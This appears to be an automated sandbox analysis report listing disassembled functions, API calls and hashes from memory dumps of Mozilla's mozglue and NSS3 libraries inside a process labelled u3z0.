                                                                                                                                                                                                                                                                                        • API String ID: 1980384892-344433685
Uniqueness

Uniqueness Score: -1.00%

APIs
• ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C7BA565
  • Part of subcall function 6C7BA470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7BA4BE
  • Part of subcall function 6C7BA470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C7BA4D6
• ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C7BA65B
• ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C7BA6B6
Strings
Memory Dump Source
• Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
• Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
Similarity
• API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
• String ID: 0$z
• API String ID: 310210123-2584888582
Uniqueness

Uniqueness Score: -1.00%

APIs
• PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6C89ACE6
• PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C89AD14
• PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C89AD23
  • Part of subcall function 6C97D930: PL_strncpyz.NSS3(?,?,?), ref: 6C97D963
• PR_LogPrint.NSS3(?,00000000), ref: 6C89AD39
Strings
Memory Dump Source
• Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
• Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
Similarity
• API ID: L_strncpyzPrint$L_strcatn
• String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
• API String ID: 332880674-3521875567
Uniqueness

Uniqueness Score: -1.00%

APIs
• TlsGetValue.KERNEL32(00000000,00000000,?,6C88124D,00000001), ref: 6C878D19
• EnterCriticalSection.KERNEL32(?,?,?,?,6C88124D,00000001), ref: 6C878D32
• PL_ArenaRelease.NSS3(?,?,?,?,?,6C88124D,00000001), ref: 6C878D73
• PR_Unlock.NSS3(?,?,?,?,?,6C88124D,00000001), ref: 6C878D8C
  • Part of subcall function 6C90DD70: TlsGetValue.KERNEL32 ref: 6C90DD8C
  • Part of subcall function 6C90DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C90DDB4
• PR_Unlock.NSS3(?,?,?,?,?,6C88124D,00000001), ref: 6C878DBA
Strings
Memory Dump Source
• Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
• Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
Similarity
• API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
• String ID: KRAM$KRAM
• API String ID: 2419422920-169145855
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77AB89: EnterCriticalSection.KERNEL32(6C7CE370,?,?,?,6C7434DE,6C7CF6CC,?,?,?,?,?,?,?,6C743284), ref: 6C77AB94
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77AB89: LeaveCriticalSection.KERNEL32(6C7CE370,?,6C7434DE,6C7CF6CC,?,?,?,?,?,?,?,6C743284,?,?,6C7656F6), ref: 6C77ABD1
                                                                                                                                                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C78945E
                                                                                                                                                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789470
                                                                                                                                                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789482
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C78949F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C78946B
                                                                                                                                                                                                                                                                                        • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C789459
                                                                                                                                                                                                                                                                                        • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C78947D
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                                                                                                                                                                                                                                        • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                                                                                                                                                                                                                                        • API String ID: 4042361484-1628757462
                                                                                                                                                                                                                                                                                        • Opcode ID: 86396fdc54bb39713ba1a7ad96c78a3431a9e988a6854bdb26c1dfdefe36b7fa
                                                                                                                                                                                                                                                                                        • Instruction ID: 4da71c6ef3f07078c10d09b33c0c791cb7ac63c59596acb3bf38808741fb11b0
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 86396fdc54bb39713ba1a7ad96c78a3431a9e988a6854bdb26c1dfdefe36b7fa
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3B01FC70B011038FDB109B6DDF15A4633B5EB05329F040537EE2E86B51D635E7A48957
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • PR_SetError.NSS3(00000000,00000000,6C8A1444,?,00000001,?,00000000,00000000,?,?,6C8A1444,?,?,00000000,?,?), ref: 6C8A0CB3
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C90C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C90C2BF
                                                                                                                                                                                                                                                                                        • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C8A1444,?,00000001,?,00000000,00000000,?,?,6C8A1444,?), ref: 6C8A0DC1
                                                                                                                                                                                                                                                                                        • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C8A1444,?,00000001,?,00000000,00000000,?,?,6C8A1444,?), ref: 6C8A0DEC
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C862AF5,?,?,?,?,?,6C860A1B,00000000), ref: 6C8C0F1A
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C0F10: malloc.MOZGLUE(00000001), ref: 6C8C0F30
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C8C0F42
                                                                                                                                                                                                                                                                                        • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C8A1444,?,00000001,?,00000000,00000000,?), ref: 6C8A0DFF
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C8A1444,?,00000001,?,00000000), ref: 6C8A0E16
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C8A1444,?,00000001,?,00000000,00000000,?), ref: 6C8A0E53
                                                                                                                                                                                                                                                                                        • PR_GetCurrentThread.NSS3(?,?,?,?,6C8A1444,?,00000001,?,00000000,00000000,?,?,6C8A1444,?,?,00000000), ref: 6C8A0E65
                                                                                                                                                                                                                                                                                        • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C8A1444,?,00000001,?,00000000,00000000,?), ref: 6C8A0E79
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8B1560: TlsGetValue.KERNEL32(00000000,?,6C880844,?), ref: 6C8B157A
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8B1560: EnterCriticalSection.KERNEL32(?,?,?,6C880844,?), ref: 6C8B158F
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8B1560: PR_Unlock.NSS3(?,?,?,?,6C880844,?), ref: 6C8B15B2
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C87B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C881397,00000000,?,6C87CF93,5B5F5EC0,00000000,?,6C881397,?), ref: 6C87B1CB
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C87B1A0: free.MOZGLUE(5B5F5EC0,?,6C87CF93,5B5F5EC0,00000000,?,6C881397,?), ref: 6C87B1D2
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8789E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C8788AE,-00000008), ref: 6C878A04
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8789E0: EnterCriticalSection.KERNEL32(?), ref: 6C878A15
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8789E0: memset.VCRUNTIME140(6C8788AE,00000000,00000132), ref: 6C878A27
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8789E0: PR_Unlock.NSS3(?), ref: 6C878A35
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1601681851-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 002d15971d66ab871fd29d83327006321c3d975061aaca2d2c0453158e6f9120
                                                                                                                                                                                                                                                                                        • Instruction ID: 583e6d55f89ec61eea536dfe2b314b64765913900395a5c7a075e0538b27fcb6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 002d15971d66ab871fd29d83327006321c3d975061aaca2d2c0453158e6f9120
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8351C9B6E012005FEB209F68DE41AAF37A8DF15258F150934EC169BB12FB31ED1587A2
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C7BB5B9
                                                                                                                                                                                                                                                                                        • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C7BB5C5
                                                                                                                                                                                                                                                                                        • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C7BB5DA
                                                                                                                                                                                                                                                                                        • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C7BB5F4
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C7BB605
                                                                                                                                                                                                                                                                                        • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C7BB61F
                                                                                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 6C7BB631
                                                                                                                                                                                                                                                                                        • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C7BB655
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1276798925-0
                                                                                                                                                                                                                                                                                        • Opcode ID: a08fcb5dfe3e72f5d2a6bdaad2f82ce2ff6a20f429fe0b83ddea37058b099a84
                                                                                                                                                                                                                                                                                        • Instruction ID: c228417591913962893bcc32d92511cbfcb92463d6c1792afb3736eacbfce16f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a08fcb5dfe3e72f5d2a6bdaad2f82ce2ff6a20f429fe0b83ddea37058b099a84
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D7318471B001068FCF10DF69C9999AEB7B5FF89325B140579E906A7740DB30BA4ACB91
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77FA80: GetCurrentThreadId.KERNEL32 ref: 6C77FA8D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77FA80: AcquireSRWLockExclusive.KERNEL32(6C7CF448,?,6C77FA1F,?,?,6C755407), ref: 6C77FA99
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C786727
                                                                                                                                                                                                                                                                                        • ?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C7867C8
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C794290: memcpy.VCRUNTIME140(?,?,?,:yl,?,:yl,00000001,?,6C793AED,?,00000001), ref: 6C7942C4
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
                                                                                                                                                                                                                                                                                        • String ID: data$v|l
                                                                                                                                                                                                                                                                                        • API String ID: 511789754-2500571834
                                                                                                                                                                                                                                                                                        • Opcode ID: e4d12df64f6803d95008b62d8772775681c3bca302b0974806422d06eb233564
                                                                                                                                                                                                                                                                                        • Instruction ID: 7b40f26f2ae723f0ba0bc4f2b9e69141e1dc778d922fb2dd8a53f4ee6adcb074
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e4d12df64f6803d95008b62d8772775681c3bca302b0974806422d06eb233564
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F9D1E074A053409FD724CF25CA48B9EB7E5BFD5308F10893DE18997B91DB30A909CB92
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C74EB57,?,?,?,?,?,?,?,?,?), ref: 6C77D652
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C74EB57,?), ref: 6C77D660
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C74EB57,?), ref: 6C77D673
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C77D888
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: free$memsetmoz_xmalloc
                                                                                                                                                                                                                                                                                        • String ID: Wtl$|Enabled
                                                                                                                                                                                                                                                                                        • API String ID: 4142949111-1387902572
                                                                                                                                                                                                                                                                                        • Opcode ID: d58a3a0052b0673a13e4dd091e5c6ae5bd10771df5f6911b638479620f3ec45d
                                                                                                                                                                                                                                                                                        • Instruction ID: 2746eb1460a0ca15d7db5335b8af1b531c944f9a8335870f60b6eb5fa11de443
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d58a3a0052b0673a13e4dd091e5c6ae5bd10771df5f6911b638479620f3ec45d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9CA115B0A003098FDF20CF69C5847AEBBF1AF59318F14806CD899AB741D735A945CBB5
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C8AAB3E,?,?,?), ref: 6C8AAC35
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C88CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C88CF16
                                                                                                                                                                                                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C8AAB3E,?,?,?), ref: 6C8AAC55
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C10C0: TlsGetValue.KERNEL32(?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C10F3
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C10C0: EnterCriticalSection.KERNEL32(?,?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C110C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C10C0: PL_ArenaAllocate.NSS3(?,?,?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C1141
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C10C0: PR_Unlock.NSS3(?,?,?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C1182
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C10C0: TlsGetValue.KERNEL32(?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C119C
                                                                                                                                                                                                                                                                                        • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C8AAB3E,?,?), ref: 6C8AAC70
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C88E300: TlsGetValue.KERNEL32 ref: 6C88E33C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C88E300: EnterCriticalSection.KERNEL32(?), ref: 6C88E350
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C88E300: PR_Unlock.NSS3(?), ref: 6C88E5BC
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C88E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C88E5CA
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C88E300: TlsGetValue.KERNEL32 ref: 6C88E5F2
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C88E300: EnterCriticalSection.KERNEL32(?), ref: 6C88E606
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C88E300: PORT_Alloc_Util.NSS3(?), ref: 6C88E613
                                                                                                                                                                                                                                                                                        • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C8AAC92
                                                                                                                                                                                                                                                                                        • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C8AAB3E), ref: 6C8AACD7
                                                                                                                                                                                                                                                                                        • PORT_Alloc_Util.NSS3(?), ref: 6C8AAD10
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C8AAD2B
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C88F360: TlsGetValue.KERNEL32(00000000,?,6C8AA904,?), ref: 6C88F38B
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C88F360: EnterCriticalSection.KERNEL32(?,?,?,6C8AA904,?), ref: 6C88F3A0
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C88F360: PR_Unlock.NSS3(?,?,?,?,6C8AA904,?), ref: 6C88F3D3
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2926855110-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 2c7677033ee0f7f4df585d04b01e58a94b9856d59b918d6b82d7965ccb14ddad
                                                                                                                                                                                                                                                                                        • Instruction ID: b1f5ee83ec9644b85ff5f1022a78a7a04ccecede83903416ab67806fc0bac6db
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c7677033ee0f7f4df585d04b01e58a94b9856d59b918d6b82d7965ccb14ddad
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE3129B1E002056FEB208FA9CD409EF7776EF84718B198938E91557F40EB31DC068BA1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C791D0F
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?,?,6C791BE3,?,?,6C791D96,00000000), ref: 6C791D18
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?,6C791BE3,?,?,6C791D96,00000000), ref: 6C791D4C
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C791DB7
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C791DC0
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C791DDA
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C791EF0: GetCurrentThreadId.KERNEL32 ref: 6C791F03
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C791EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C791DF2,00000000,00000000), ref: 6C791F0C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C791EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C791F20
